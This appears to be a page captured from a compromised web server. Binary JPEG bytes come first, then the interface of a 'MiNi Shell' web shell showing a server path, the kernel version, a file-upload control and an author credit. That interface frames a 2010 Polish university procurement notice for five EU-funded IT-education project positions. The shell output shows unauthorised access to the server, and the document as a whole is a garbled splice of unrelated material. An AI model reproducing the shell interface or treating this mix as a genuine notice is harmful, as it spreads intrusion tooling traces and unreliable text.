JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100610/163414-N-2010.html

<p class="kh_header"><b>Kraków: Zatrudnienie na niżej wymienionych stanowiskach w ramach projektu Ku przyszłości- zwiększenie liczby absolwentów informatyki Uniwersytetu Pedagogicznego w Krakowie współfinansowanego ze środków Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 163414 - 2010; data zamieszczenia: 10.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Pedagogiczny im. Komisji Edukacji Narodowej w Krakowie , ul. Podchorążych 2, 30-084 Kraków, woj. małopolskie, tel. 0-12 662 60 53, faks 0-12 637 22 43.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ap.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zatrudnienie na niżej wymienionych stanowiskach w ramach projektu Ku przyszłości- zwiększenie liczby absolwentów informatyki Uniwersytetu Pedagogicznego w Krakowie współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Pełnienie funkcji Koordynatora Projektu- Ku przyszłości, 2.Pełnienie funkcji Koordynatora ds Merytorycznych Projektu- Ku przyszłości, 3.Pełnienie funkcji Specjalisty ds. Administracyjnych i Promocji Projektu- Ku przyszłości, 4.Pełnienie funkcji Specjalisty ds. Finansowych Projektu- Ku przyszłości, 5.Pełnienie funkcji Specjalisty ds. Technicznych Projektu- Ku przyszłości..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.up.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Pedagogiczny im.KEN,  Kraków, ul. Podchorążych 2, pok.177.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2010 godzina 09:00, miejsce: Uniwersytet Pedagogiczny im.KEN,  Kraków, ul. Podchorążych 2, pok.177.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Ku przyszłości- zwiększenie liczby absolwentów informatyki Uniwersytetu Pedagogicznego w Krakowie współfinansowanego ze środków Europejskiego Funduszu Społecznego (Priorytet IV Szkolnictwo wyższe i nauka, Działanie 4.1 Wzmocnienie i rozwój potencjału dydaktycznego uczelni oraz zwiększenie liczby absolwentów kierunków o kluczowym znaczeniu dla gospodarki opartej na wiedzy Poddziałanie 4.1.2 Zwiększenie liczby absolwentów kierunków o kluczowym znaczeniu dla gospodarki opartej na wiedzy), realizowanego zgodnie z wnioskiem nr POKL.04.01.02-00-008/10.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 Stanowisko: Koordynator Projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kwalifikacje wymagane od kandydata na stanowisko Koordynatora projektu:
1)   posiada co najmniej wykształcenie wyższe (magisterskie),
2)  posiada co najmniej 3 letnie doświadczenie w pracy w zakresie edukacji informatycznej na poziomie szkolnictwa wyższego, 
3)  posiada doświadczenie w zarządzaniu projektem o charakterze edukacyjnym (kształcenia informatycznego) realizowanym przez szkołę wyższą, finansowanym ze środków Unii Europejskiej, na stanowisku Koordynatora lub Kierownika Projektu,
4) ukończył szkolenia z zakresu dokumentacji prawa zamówień publicznych w projektach EFS / PO KL,
5)  jest dyspozycyjny - praca zarówno w godzinach dyżuru w Biurze Projektu, jak i w razie potrzeby (wezwania) Zamawiającego,
6)  posiada pełną zdolność do czynności prawnych oraz korzysta z pełni praw publicznych, 
7)  nie był karany za przestępstwo popełnione umyślnie lub przestępstwo skarbowe, nie podlega wykluczeniu z art. 24 ust. 1 pkt 4 ustawy: Prawo zamówień publicznych.
Obowiązki Koordynatora projektu:
1)  planowanie działań i wywiązywanie się ze wskaźników projektu,
2)  kierowanie bieżącymi sprawami związanymi z realizacją projektu,
3) koordynacja prawidłowej realizacji projektu zgodnie z obowiązującymi przepisami oraz nadzór nad wszystkimi działaniami podejmowanymi w projekcie,
4)  nadzór nad wydatkami,
5) nadzór nad członkami Zarządu projektu i innymi osobami zatrudnionymi do jego realizacji,
6) nadzór nad prowadzeniem dokumentacji związanej z realizacją projektu,
7) podejmowanie decyzji związanych z modyfikacją projektu,
8) nadzór na prawidłowym przebiegiem realizacji projektu zgodnym z budżetem i harmonogramem,
9) koordynacja rozliczeń finansowych, przygotowywanie wraz ze Specjalistą ds. finansowych wniosków o płatności,
10) przygotowywanie wraz z Koordynatorem Merytorycznym treści umów z pracownikami dydaktycznymi,
11) wsparcie personelu projektu w zakresie działań informacyjno - promocyjnych,
12) kontakt bieżący z uczestnikami projektu,
13) obecność podczas kontroli i/lub audytu projektu,
14) utrzymywanie stałych kontaktów z Instytucją Pośredniczącą / Instytucją Wdrażającą, informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu, terminowe przesyłanie wszystkich wymaganych dokumentów i informacji, przestrzeganie obowiązków i zaleceń wynikających z realizacji umowy, procedur, standardów, instrukcji do sprawozdań oraz innych obowiązujących dokumentów,
15) przygotowywanie i koordynacja korespondencji związanej z projektem do Instytucji Pośredniczącej / Instytucji Wdrażającej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 Stanowisko: Koordynator Merytoryczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kwalifikacje wymagane od kandydata na stanowisko Koordynatora merytorycznego:
1) posiada co najmniej wykształcenie wyższe (magisterskie) - preferowane: informatyka lub ukończone studia podyplomowe informatyczne,
2) posiada co najmniej 3 letnie doświadczenie w pracy w zakresie edukacji informatycznej na poziomie szkolnictwa wyższego, 
3) posiada umiejętność administrowania platformą e-learningową i zarządzania kursami,
4) posiada doświadczenie w przygotowaniu materiałów dydaktycznych do pracy zdalnej,
5) ma doświadczenie w zakresie opracowywania planów studiów i kart kursów (potwierdzone przez kierownika/dyrektora jednostki szkoły wyższej),
6) posiada doświadczenie w pracy w projektach dofinansowanych z Europejskiego Funduszu Społecznego o charakterze edukacyjnym (kształcenie informatyczne) - nie mniej niż 2, w tym co najmniej jeden realizowany w szkole wyższej,
7) jest dyspozycyjny - praca zarówno w godzinach dyżuru w Biurze Projektu, jak i w razie potrzeby (wezwania) Zamawiającego,
8) posiada pełną zdolność do czynności prawnych oraz korzysta z pełni praw publicznych, 
9) nie był karany za przestępstwo popełnione umyślnie lub przestępstwo skarbowe, nie podlega wykluczeniu z art. 24 ust. 1 pkt 4 ustawy: Prawo zamówień publicznych,
Obowiązki Koordynatora merytorycznego:
1) monitorowanie wskaźników projektu i sprawozdawanie Koordynatorowi,
2) organizacja i przeprowadzenie procesu rekrutacji uczestników do poszczególnych zadań projektu,
3) planowanie zajęć wyrównawczych, specjalizacyjnych, dodatkowych,
4) współpraca z opiekunami roczników na kierunku zamawianym w celu włączenia zadań projektu      w tok studiów,
5) współpraca z Prezesem i Opiekunem Koła Naukowego Informatyków,
6) nadzorowanie wydatków w ramach działalności Koła Naukowego Informatyków,
7) nadzór nad prawidłowym przebiegiem zajęć,
8)opieka nad platformą e-learningową w tym administrowanie baza materiałów dydaktycznych,
9) opracowywanie i realizowanie systemu ewaluacyjnego,
10) sporządzanie statystyk i podsumowań pracy w systemie e-learningowym studentów.
11) bieżący kontakt z uczestnikami projektu,
12) obecność podczas kontroli i audytu projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 Stanowisko Specjalisty ds. Administracyjnych i Promocji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kwalifikacje wymagane od kandydata na stanowisko Specjalisty ds. administracyjnych promocji:
1) posiada co najmniej wykształcenie wyższe (magisterskie),
2) posiada doświadczenie w pracy na stanowisku Asystenta Koordynatora lub Specjalisty ds. Administracyjnych, lub Specjalisty ds. Promocji (min. 12 miesięcy),
3) posiada umiejętność biegłej obsługi komputera, w szczególności arkusza kalkulacyjnego, 
4) posiada doświadczenie w zakresie promocji i organizacji pracy administracyjnej podczas konferencji, szkoleń, warsztatów, targów  itp. organizowanych przez szkołę wyższą, 
5) ukończył szkolenie z zakresu budżetu projektu i kwalifikowalności kosztów PO KL,
6) jest dyspozycyjny - praca zarówno w godzinach dyżuru w Biurze Projektu, jak i w razie potrzeby (wezwania) Zamawiającego,
7) posiada pełną zdolność do czynności prawnych oraz korzysta z pełni praw publicznych, 
8) nie był karany za przestępstwo popełnione umyślnie lub przestępstwo skarbowe, nie podlega wykluczeniu z art. 24 ust. 1 pkt 4 ustawy: Prawo zamówień publicznych
Obowiązki Specjalisty ds. administracyjnych i promocji:
1) prowadzenie biura projektu, w tym dokumentacji niezbędne do prawidłowej realizacji projektu,
2) przygotowywanie i prowadzenie promocji projektu przez cały okres jego realizacji, w tym dystrybucję materiałów promocyjnych
3) zbieranie i opracowywanie danych na potrzeby monitoringu i sprawozdawczości dotyczącej realizacji projektu,
4) udział w procesie rekrutacji i selekcji uczestników projektu, przygotowywanie wykazów do list stypendialnych i stażowych, 
5) wsparcie Koordynatora Merytorycznego w przeprowadzaniu ewaluacji zajęć oraz projektu,
6) wykonywanie analizy statystycznej danych z ewaluacji,
7) archiwizowanie dokumentów,
8) obecność podczas kontroli i/lub audytu projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4 Stanowisko Specjalisty ds. finansowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kwalifikacje wymagane od kandydata na stanowisko Specjalisty ds. finansowych:
1) posiada wykształcenie wyższe o profilu finansowo- księgowym lub ekonomicznym,
2) posiada co najmniej 2-letnie doświadczenie w pracy w służbach finansowo-księgowych,
3) legitymuje się doświadczeniem w realizacji projektów współfinansowanych z Europejskich Funduszy Strukturalnych obejmujących swym zakresem usługi edukacyjne (np: studia magisterskie, podyplomowe, kursy, szkolenia, etc.) tj. posiada doświadczenie w rozliczaniu, co najmniej jednego projektu, którego realizacja trwała minimum 12 miesięcy, 
4) odbył(a) szkolenie z zakresu rozliczania dotacji z Funduszy Unii Europejskiej,
5) posiada biegłą umiejętność obsługi komputera w zakresie zaawansowanym oraz umiejętność posługiwania się dedykowanym oprogramowaniem w systemie SIMPLE w zakresie finansowo- księgowym oraz posiada uprawnienia dostępu do tego  systemu,
6) posiada umiejętność pracy w aplikacji Generator Wniosków Płatniczych,
7) posiada pełną zdolność do czynności prawnych oraz korzysta z pełni praw publicznych, 
8) nie był karany za przestępstwo popełnione umyślnie lub przestępstwo skarbowe, nie podlega wykluczeniu z art. 24 ust. 1 pkt 4 ustawy: Prawo zamówień publicznych.
Obowiązki Specjalisty ds. finansowych:
1) kontrola zgodności realizacji projektu z założonym harmonogramem i budżetem projektu,
2) kompletowanie i przechowywanie dokumentacji finansowo-księgowej projektu,
3) sporządzanie umów cywilno-prawnych dla obsługi projektu na podstawie dostarczonych przez koordynatora zakresów czynności,
4) prawidłowe dokumentowanie wydatków w tym: opisywanie dokumentów zgodnie z wymogami Projektu oraz weryfikacja zgodności poniesionego wydatku z nadaną opinią przez Samodzielną Sekcję ds. Zamówień Publicznych,
5) nadzór nad terminowością realizacji płatności za faktury i rachunki dotyczące projektu,
6) monitorowanie rachunku bankowego projektu,
7) analiza ewidencji księgowej w zakresie kompletności ujęcia kosztów projektu,
8) wykonywanie kserokopii niezbędnej dokumentacji finansowej i potwierdzanie jej zgodności z oryginałem,
9) współpraca z koordynatorem projektu w zakresie rozliczeń finansowych,
10) sporządzenie wniosku o płatność w części finansowej,
11) udział w archiwizacji dokumentacji finansowo-księgowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5 Stanowisko Specjalisty ds. technicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kwalifikacje wymagane od kandydata na stanowisko Specjalisty ds. technicznych
1) posiada min 2 letnie doświadczenie na stanowisku pracownika technicznego, którego zakres obejmował obsługę sprzętu komputerowego,
2) ma doświadczenie w opiece technicznej i organizacyjnej nad pracownią komputerową,
3) posiada doświadczenie w zakresie instalacji i konfiguracji sprzętu i programów komputerowych,
4) jest dyspozycyjny - praca zarówno w godzinach zajęć laboratoryjnych, jak i w razie potrzeby (wezwania) Zamawiającego,
5) doświadczenie w tworzeniu i zarządzaniu serwisem internetowym,
6) posiada pełną zdolność do czynności prawnych oraz korzysta z pełni praw publicznych, 
7) nie był karany za przestępstwo popełnione umyślnie lub przestępstwo skarbowe, nie podlega wykluczeniu z art. 24 ust. 1 pkt 4 ustawy: Prawo zamówień publicznych.
Obowiązki Specjalisty ds. technicznych:
1) wykonanie specyfikacji zakupu sprzętu i oprogramowania,
2) sprawowanie nadzoru nad procedurą zakupu,
3) dokonywanie instalacji programów,
4) przeprowadzanie konserwacji i rekonfiguracji zakupionego sprzętu i oprogramowania,
5) pomoc techniczna w trakcie realizacji zajęć w laboratorium,
6) dokonywanie na bieżąco aktualizacji strony WWW projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com